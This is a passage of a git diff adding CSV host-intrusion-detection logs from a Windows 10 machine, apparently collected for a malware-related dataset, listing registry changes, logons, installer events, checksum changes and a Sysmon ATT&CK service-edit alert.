'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a7e6\TriggerInfo\1' was added. +" +"Apr 4, 2020 @ 16:43:19.540",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a7e6\TriggerInfo\2' was added. +" +"Apr 4, 2020 @ 16:43:19.557",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a7e6\TriggerInfo\3' was added. +" +"Apr 4, 2020 @ 16:43:19.571",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a7e6\TriggerInfo\4' was added. +" +"Apr 4, 2020 @ 16:43:19.587",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a7e6' was added. +" +"Apr 4, 2020 @ 16:43:21.899",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:21.915",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2a7e6' was added. +" +"Apr 4, 2020 @ 16:43:22.015",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:22.025",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:43:22.243",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:22.259",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:43:23.864",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:23.885",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:43:24.072",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:24.089",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:43:24.666",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:24.697",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:43:24.993",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:25.009",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:43:25.090",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:25.103",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:43:55.791",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:55.809",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a7e6\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 16:43:55.837",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a7e6' was added. +" +"Apr 4, 2020 @ 16:44:01.199",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:44:01.214",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:44:02.900",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:44:02.915",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:44:03.510",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:44:03.525",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:44:19.462",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:44:19.478",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:44:20.338",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:44:20.354",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:44:30.182",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:44:30.197",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2a7e6' was added. +" +"Apr 4, 2020 @ 16:35:43.951",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:36:15.359",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 16:36:47.528",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:36:52.657",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 16:41:39.790",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'." +"Apr 4, 2020 @ 16:41:42.639",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 16:41:42.665",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 16:41:49.112",3,"The database engine is starting a new instance", +"Apr 4, 2020 @ 16:41:49.299",3,"The database engine attached a database", +"Apr 4, 2020 @ 16:41:49.454",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:41:49.535",3,"The Windows Search Service started", +"Apr 4, 2020 @ 16:42:00.024",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:42:20.103",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 16:42:20.134",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 16:42:20.180",3,"Windows User Logoff", +"Apr 4, 2020 @ 16:42:20.196",3,"Windows User Logoff", +"Apr 4, 2020 @ 16:42:25.509",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 16:43:10.228",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:43:37.697",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 16:43:41.463",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:44:10.369",3,"Software Protection service scheduled successfully", diff --git a/data/MW_15_HIDS_2.csv b/data/MW_15_HIDS_2.csv new file mode 100644 index 0000000..e37ac3d --- /dev/null +++ b/data/MW_15_HIDS_2.csv @@ -0,0 +1,2154 @@ +timestamp,"rule.level","rule.description","full_log","data.win.system.message" +"Apr 24, 2020 @ 13:26:44.799",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:26:40.999",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T13:21:38Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 13:26:11.436",3,"Windows installer reconfigured the product",,"""Windows Installer reconfigured the product. Product Name: Office 16 Click-to-Run Licensing Component. Product Version: 16.0.12624.20466. Product Language: 0. Manufacturer: Microsoft Corporation. Reconfiguration success or error status: 0.""" +"Apr 24, 2020 @ 13:26:10.967",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:26:10.264",3,"Windows Installer began an installation process",,"""Beginning a Windows Installer transaction: c:\program files\microsoft office\root\integration\sppredist.msi. Client Process Id: 4068.""" +"Apr 24, 2020 @ 13:26:10.201",3,"Windows installer reconfigured the product",,"""Windows Installer reconfigured the product. Product Name: Office 16 Click-to-Run Localization Component. Product Version: 16.0.12624.20442. Product Language: 1033. Manufacturer: Microsoft Corporation. Reconfiguration success or error status: 0.""" +"Apr 24, 2020 @ 13:26:10.170",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start.""" +"Apr 24, 2020 @ 13:26:10.107",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 24, 2020 @ 13:26:09.952",3,"The database engine attached a database",,"""SearchIndexer (6080,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000015:0032:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000005 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.000198 +J(0) +M(C:0K, Fs:25, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.007471 -0.002063 (5) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:42, WS:128K # 0K, PF:148K # 0K, P:148K) +[4] 0.000145 +J(0) +[5] - +[6] - +[7] - +[8] 0.002728 -0.001330 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:52, WS:208K # 0K, PF:660K # 0K, P:660K) +[9] 0.008197 -0.000507 (5) CM -0.007485 (1) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 0K, PF:256K # 136K, P:256K) +[10] 0.000359 -0.000206 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 0K, PF:96K # 96K, P:96K) +[11] 0.000014 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 12K, PF:0K # 0K, P:0K) +[12] 0.000032 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000004 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 24, 2020 @ 13:26:09.843",3,"The database engine is starting a new instance",,"""SearchIndexer (6080,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 24, 2020 @ 13:26:09.826",3,"Windows Installer began an installation process",,"""Beginning a Windows Installer transaction: c:\program files\microsoft office\root\integration\c2rintloc.en-us.16.msi. Client Process Id: 4068.""" +"Apr 24, 2020 @ 13:26:09.732",3,"Windows installer reconfigured the product",,"""Windows Installer reconfigured the product. Product Name: Office 16 Click-to-Run Extensibility Component. Product Version: 16.0.12624.20442. Product Language: 0. Manufacturer: Microsoft Corporation. Reconfiguration success or error status: 0.""" +"Apr 24, 2020 @ 13:26:08.014",3,"Windows Installer began an installation process",,"""Beginning a Windows Installer transaction: c:\program files\microsoft office\root\integration\c2rint.16.msi. Client Process Id: 4068.""" +"Apr 24, 2020 @ 13:26:07.466",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)",, +"Apr 24, 2020 @ 13:26:04.983",3,"The Windows Search Service stopped normally",,"""Windows Search Service stopped normally. +""" +"Apr 24, 2020 @ 13:26:04.967",5,"The database engine stopped an instance",,"""SearchIndexer (5760,T,97) Windows: The database engine stopped the instance (0). + +Dirty Shutdown: 0 + +Internal Timing Sequence: +[1] 0.000013 +J(0) +M(C:0K, Fs:2, WS:8K # 0K, PF:0K # 0K, P:0K) +[2] 0.000028 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[3] 0.000001 +J(0) +[4] 0.000003 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[5] 0.008366 -0.006186 (5) WT +J(CM:5, PgRf:0, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:88, WS:220K # 0K, PF:0K # 0K, P:0K) +[6] 0.000632 +J(0) +M(C:0K, Fs:3, WS:-608K # 0K, PF:-1220K # 0K, P:-1220K) +[7] 0.000013 +J(0) +[8] 0.006678 -0.004577 (11) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:4096/2) +M(C:0K, Fs:33, WS:-100K # 0K, PF:-168K # 0K, P:-168K) +[9] 0.009439 -0.009395 (1) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:66/1) +M(C:0K, Fs:4, WS:16K # 0K, PF:20K # 0K, P:20K) +[10] 0.000006 +J(0) +[11] 0.001641 -0.000709 (2) WT +J(0) +[12] 0.000053 +J(0) +M(C:0K, Fs:0, WS:-4K # 0K, PF:-4K # 0K, P:-4K) +[13] 0.000294 +J(0) +[14] 0.000025 +J(0) +M(C:0K, Fs:0, WS:-12K # 0K, PF:-32K # 0K, P:-32K) +[15] 0.000007 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K).""" +"Apr 24, 2020 @ 13:26:04.435",3,"Windows installer reconfigured the product",,"""Windows Installer reconfigured the product. Product Name: Office 16 Click-to-Run Extensibility Component. Product Version: 16.0.12624.20442. Product Language: 0. Manufacturer: Microsoft Corporation. Reconfiguration success or error status: 0.""" +"Apr 24, 2020 @ 13:26:04.029",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'",, +"Apr 24, 2020 @ 13:26:02.689",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:25:59.178997400Z"",""eventRecordID"":""2156"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:25:59.169\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ose64\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:25:59.169"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ose64\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:25:59.169 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ose64\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:25:51.842",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:25:51.716",3,"Windows Installer began an installation process",,"""Beginning a Windows Installer transaction: c:\program files\microsoft office\root\integration\c2rint.16.msi. Client Process Id: 4068.""" +"Apr 24, 2020 @ 13:25:51.138",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:25:51.123",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 24, 2020 @ 13:25:51.091",3,"The database engine attached a database",,"""SearchIndexer (5760,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000015:002B:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000005 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.000203 +J(0) +M(C:0K, Fs:25, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.008152 -0.003156 (5) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:40, WS:120K # 0K, PF:148K # 0K, P:148K) +[4] 0.000119 +J(0) +[5] - +[6] - +[7] - +[8] 0.006284 -0.001723 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:51, WS:204K # 0K, PF:640K # 0K, P:640K) +[9] 0.010427 -0.000233 (5) CM -0.009965 (1) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:68, WS:268K # 0K, PF:260K # 112K, P:260K) +[10] 0.000651 -0.000554 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 0K, PF:96K # 96K, P:96K) +[11] 0.000014 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 12K, PF:0K # 0K, P:0K) +[12] 0.000031 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000004 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 24, 2020 @ 13:25:51.029",3,"The database engine is starting a new instance",,"""SearchIndexer (5760,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 24, 2020 @ 13:25:46.060",5,"The database engine stopped an instance",,"""SearchIndexer (4572,T,97) Windows: The database engine stopped the instance (0). + +Dirty Shutdown: 0 + +Internal Timing Sequence: +[1] 0.000010 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.000025 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[3] 0.001946 -0.001768 (2) CM +J(CM:2, PgRf:13, Rd:0/0, Dy:0/24, Lg:662/15) +M(C:0K, Fs:14, WS:56K # 0K, PF:0K # 0K, P:0K) +[4] 0.000008 +J(0) +[5] 0.054981 -0.001984 (58) CM -0.018642 (7) WT +J(CM:58, PgRf:0, Rd:0/58, Dy:0/0, Lg:0/0) +M(C:0K, Fs:476, WS:488K # 0K, PF:0K # 0K, P:0K) +[6] 0.001912 +J(0) +M(C:0K, Fs:1, WS:-2312K # 0K, PF:-6760K # 0K, P:-6760K) +[7] 0.000011 +J(0) +[8] 0.009955 -0.005809 (12) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3078/2) +M(C:0K, Fs:26, WS:4K # 0K, PF:104K # 0K, P:104K) +[9] 0.000409 -0.000377 (2) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:66/1) +M(C:0K, Fs:2, WS:8K # 0K, PF:0K # 0K, P:0K) +[10] 0.000003 +J(0) +[11] 0.005441 -0.004173 (2) WT +J(0) +[12] 0.000040 +J(0) +M(C:0K, Fs:0, WS:-4K # 0K, PF:-4K # 0K, P:-4K) +[13] 0.000348 +J(0) +M(C:0K, Fs:0, WS:0K # 0K, PF:4K # 0K, P:4K) +[14] 0.000051 +J(0) +M(C:0K, Fs:0, WS:-176K # 0K, PF:-184K # 0K, P:-184K) +[15] 0.000003 +J(0).""" +"Apr 24, 2020 @ 13:25:45.998",3,"The Windows Search Service stopped normally",,"""Windows Search Service stopped normally. +""" +"Apr 24, 2020 @ 13:25:12.279",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '0d61dacf49c4b7682f45fff7f8f57479' +New md5sum is : '796cc5e23fc204228dd56503a66aa1bb' +Old sha1sum was: '71a31e06fb81f2dcbcdf75c75730b24491f00526' +New sha1sum is : '40ac1475be0431bb98a411f5452651252c4e21e3' +", +"Apr 24, 2020 @ 13:25:12.264",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '6ea2dee3d2bb35e8d704d196aedd6a76' +New md5sum is : 'bf956c5aed134ca1bb89a65648982482' +Old sha1sum was: '3bf6639fb706c11a88f9ee628fac8040d19fe6e6' +New sha1sum is : '720f00e68ce736c9b6d51dd40b56e82fb61e8d8a' +", +"Apr 24, 2020 @ 13:25:08.967",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_42bf6' was added. +", +"Apr 24, 2020 @ 13:25:08.951",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:24:59.451",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'f5e14498d88793ab9e47ba95008e4f35' +New md5sum is : '329ec3570a2953823519c93ae41cfdd7' +Old sha1sum was: '572aa3d10a303409c35a7f5afc5aaacefa8eabdd' +New sha1sum is : '110906058263ebb96cddf57a2c0ec6e23fe88017' +", +"Apr 24, 2020 @ 13:24:59.436",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'bf02f240281a1be47db753d1369bc887' +New md5sum is : 'd5c73bd526d32db32f836bf62cd41e08' +Old sha1sum was: '7f27010184bfe5915bac77ef2d4b82c97b694471' +New sha1sum is : '9d2344e17ff025bdec81b53475f19617d5b1519d' +", +"Apr 24, 2020 @ 13:24:58.919",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum 